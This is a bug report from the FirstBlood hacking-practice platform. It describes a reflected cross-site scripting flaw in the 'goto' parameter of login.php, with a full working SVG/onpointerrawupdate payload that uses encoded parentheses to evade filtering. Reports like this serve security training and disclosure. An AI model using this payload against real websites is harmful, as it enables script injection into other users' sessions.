FirstBlood-#308Reflective XSS on login.php via goto parameter
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-25, panya Level 7 reported:

The goto parameter still vulnerable to reflective XSS.

Steps to reproduce:

  1. Open https://579a3c7897af-panya.a.firstbloodhackers.com/login.php?goto=%22%3E%3Csvg/style=%22position:fixed;top:0;left:0;width:100%;height:100%;z-index:100%22/onpointerrawupdate=%22%0aconfirm%26lpar;origin%26rpar;%22%3E
  2. Move the mouse to any point of the site.

Actual result:

There will be an alert with the text "https://579a3c7897af-panya.a.firstbloodhackers.com"

Expected result:

The goto parameter value should be properly escaped or sanitized. The alert should not be shown.

Impact:

XSS on behalf of a user of this site.

P3 Medium

Endpoint: /login.php

Parameter: goto

Payload: "><svg/style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:100"/onpointerrawupdate="%0aconfirm%26lpar;origin%26rpar;">


FirstBlood ID: 26
Vulnerability Type: Reflective XSS

The developers thought they had fixed ?goto= when reflected in an input tag on login.php from a similar bug (ID 39), but because this endpoint uses legacy code their changes were not applied here and thus the XSS was forgotten.